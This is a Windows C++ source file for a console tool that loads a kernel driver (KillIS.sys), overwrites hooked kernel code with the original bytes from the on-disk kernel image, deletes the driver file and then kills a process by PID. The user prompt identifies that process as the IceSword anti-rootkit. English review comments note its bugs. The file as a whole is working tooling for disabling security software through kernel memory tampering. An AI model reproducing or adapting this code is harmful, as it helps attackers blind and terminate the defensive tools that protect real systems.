// InlineReHOOK.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "NtQuerySystemInformation.h"
#include "Driver.h"
#include "resource.h"
#include "ObjectKill.h"
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <winioctl.h>
// IOCTL codes used to talk to the driver (presumably mirrored on the driver
// side — keep both definitions in sync). All four use METHOD_BUFFERED and
// FILE_ANY_ACCESS, i.e. no specific access right is required on the device
// handle; whether an unprivileged caller can reach the driver at all is
// decided by the device object's security inside the driver, not visible here.
#define IOCTL_GETADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTCODE_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x905,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x910,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTBYTECOUNT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x915,METHOD_BUFFERED,FILE_ANY_ACCESS)
// Forward declarations. Note the ULONG parameters of GetNTOriCode versus the
// LONG parameters of PatchHighMemory — same width on Win32, but inconsistent.
PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount);
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount);
// Handle to the loaded driver's device. Set once in main() by LoadDriver(),
// used by PatchHighMemory(); never reset after UnloadDriver().
HANDLE hDevice;
// Entry point of the console tool. Sequence as written: FreeSYS() (presumably
// removes a stale driver instance — Driver.h), LoadDriver() from a fixed path,
// one IOCTL to fetch a kernel address from the driver, PatchHighMemory() to
// overwrite bytes at that address with the on-disk image's bytes, unload and
// delete the driver file, then ObjectKill() on a PID typed by the user
// (ObjectKill.h; the name suggests it terminates that process — not visible here).
// argc/argv are unused. Returns 0 unconditionally; no error path exists.
// NOTE(review): the driver image exists on disk only for the duration of one
// run (LoadDriver ... DeleteFile); that short-lived file plus the driver load
// is the observable trace of this tool.
int main(int argc, char* argv[])
{
char DeviceRet[25]; // output buffer for IOCTL_GETADDR_CONTROL
DWORD ReBytes; // bytes returned by the driver I/O exchange (never read)
memset(DeviceRet,0,4); // only the first 4 of 25 bytes are zeroed
ULONG NtAddr;
ULONG ByteCount;
ULONG BeginKrnlAddr;
FreeSYS();
hDevice = LoadDriver("C:\\KillIS.sys"); // result is not validated before use
memset(DeviceRet,0,4); // redundant: nothing has written DeviceRet since the first memset
// Ask the driver for the target kernel address. The BOOL result is ignored;
// on failure DeviceRet stays zeroed and NtAddr ends up 0.
DeviceIoControl(hDevice,IOCTL_GETADDR_CONTROL,0,0,DeviceRet,4,&ReBytes,NULL);
// NOTE(review): atol() expects a NUL-terminated string. If the driver fills
// all 4 output bytes with digits, the scan continues into the 21 bytes that
// were never initialized. 4 characters are also too few for a decimal 32-bit
// address, so how the driver encodes the value is unclear — confirm against
// its IOCTL_GETADDR_CONTROL handler.
NtAddr = atol(DeviceRet);
BeginKrnlAddr = NtAddr; // start address obtained (this copy is never used)
ByteCount = 10; // number of code bytes to rewrite (hard-coded)
PatchHighMemory(NtAddr,ByteCount); // ULONG -> LONG conversion, same width on Win32
UnloadDriver(hDevice);
DeleteFile("C:\\KillIS.sys"); // return value ignored
LONG pid;
printf("\n請輸入冰刃的PID值:");
// scanf result is not checked: on non-numeric input pid is passed on uninitialized.
scanf("%ld",&pid);
ObjectKill(pid);
return 0;
}
// Sends three IOCTLs on the global hDevice: the target kernel address, the
// byte count, then KrnlByteCount bytes taken from the on-disk kernel image
// (GetNTOriCode), which the driver writes over that address ("un-patch").
// Parameters are LONG although the caller passes ULONG; same width on Win32.
// NOTE(review): none of the DeviceIoControl return values are checked, so a
// partial or failed sequence is indistinguishable from success. When no Code
// buffer is returned the function exit(0)s, skipping the caller's
// UnloadDriver/DeleteFile cleanup, so the driver stays loaded. The Code
// buffer (malloc'd in GetNTOriCode) is never freed.
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount)
{
//device var
char DeviceRet[25]; // unused in this function
DWORD ReBytes; // bytes returned by the driver I/O exchange (never read)
memset(DeviceRet,0,4);
PUCHAR ByteWrite;
PUCHAR Code;
// "%0.8X" with LONG arguments works because LONG is 32-bit on Windows;
// "%08lX" is the type-correct spelling.
printf("高位內存起始地址:0x%0.8X 數目:0x%0.8X\n",NtBeginAddr,KrnlByteCount);
Code = GetNTOriCode(NtBeginAddr,KrnlByteCount);
if(!Code) exit(0); // exits with a success status even though this is a failure
ByteWrite = Code; // address of the original code bytes
printf("開始反補丁");
// Send the BeginKrnlAddr (address to rewrite). Input size is sizeof(ULONG)
// while the variable is LONG — equal on Win32.
DeviceIoControl(hDevice,IOCTL_INPUTADDR_CONTROL,&NtBeginAddr,sizeof(ULONG),0,0,&ReBytes,NULL);
// Send the ByteCount (number of bytes to rewrite).
DeviceIoControl(hDevice,IOCTL_INPUTBYTECOUNT_CONTROL,&KrnlByteCount,sizeof(ULONG),0,0,&ReBytes,NULL);
// Send the byte data; per the original comment the driver performs the
// write on receiving this one. A negative KrnlByteCount would turn into a
// huge input size via the multiply.
DeviceIoControl(hDevice,IOCTL_INPUTCODE_CONTROL,ByteWrite,KrnlByteCount*sizeof(UCHAR),0,0,&ReBytes,NULL);
}
// Returns a malloc'd buffer of ByteCount bytes copied from a user-mode mapping
// of a kernel module's file image, at the RVA that NTBeginKrnlAddress has in
// the live kernel (address minus the module's load base). Uses the first entry
// of the system module list (pModInfo->smi; assumed to be the kernel image —
// TODO confirm against the PSYSMODULELIST layout in NtQuerySystemInformation.h).
// Returns 0 if the address lies beyond that module's end. The caller owns the
// returned buffer; nothing here frees it.
// NOTE(review): pModInfo is leaked on the success path and hKernel is never
// released with FreeLibrary(); see the per-line notes for unchecked failures.
PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount)
{
HINSTANCE hNTDll;
ULONG nRet;
ULONG nQuerySize;
ULONG Success;
PSYSMODULELIST pModInfo = NULL;
// Resolve NtQuerySystemInformation into the global function pointer
// (presumably declared in NtQuerySystemInformation.h). GetProcAddress's
// result is not checked. Calling FreeLibrary immediately only works because
// ntdll stays mapped in every process; otherwise the pointer would dangle.
hNTDll = LoadLibrary("ntdll");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(hNTDll,"NtQuerySystemInformation");
FreeLibrary(hNTDll);
// Query the loaded kernel modules: a first call with a NULL buffer to learn
// the required size, then the real call. The malloc result is not checked.
Success = NtQuerySystemInformation(SystemModuleInfo,NULL,0,&nQuerySize);
pModInfo = (PSYSMODULELIST)malloc(nQuerySize);
Success = NtQuerySystemInformation(SystemModuleInfo,pModInfo,nQuerySize,&nRet);
// NOTE(review): Success is ULONG, so "Success < 0" is always false and this
// NTSTATUS failure check is dead code. Were it to fire, pModInfo would be
// NULL at the dereference immediately below.
if( Success < 0 )
{
free( pModInfo );
pModInfo = NULL;
}
// The address must fall below the module's end (Base + Size). There is no
// lower-bound check: an address below Base makes FileOffset wrap around.
if( NTBeginKrnlAddress >= (ULONG)pModInfo->smi->Size+(ULONG)pModInfo->smi->Base )
return 0;
HMODULE hKernel;
PUCHAR buf;
buf = (PUCHAR)malloc(ByteCount); // unchecked; ByteCount == 0 gives malloc(0)
// Despite the name this is an RVA (offset from the load base), not a file offset.
ULONG FileOffset = NTBeginKrnlAddress-(ULONG)(pModInfo->smi->Base);
// Map the module's file as a data image (DONT_RESOLVE_DLL_REFERENCES: no
// DllMain, imports left unresolved). ImageName+ModuleNameOffset appears to be
// the bare file name, so it is resolved through the DLL search order rather
// than the kernel's actual path — whatever that search finds first is what
// gets mapped. hKernel is not checked for NULL; a failed load makes the loop
// below read from address FileOffset.
hKernel = LoadLibraryEx(pModInfo->smi->ImageName+pModInfo->smi->ModuleNameOffset,0,DONT_RESOLVE_DLL_REFERENCES);
// Copy the bytes one at a time (equivalent to a single memcpy of ByteCount).
// "int c < ULONG ByteCount" compares signed with unsigned.
for(int c=0;c<ByteCount;c++)
memcpy(buf+c,(PUCHAR)((ULONG)hKernel+FileOffset+c),sizeof(UCHAR));
return buf; // return pointer; caller owns it
}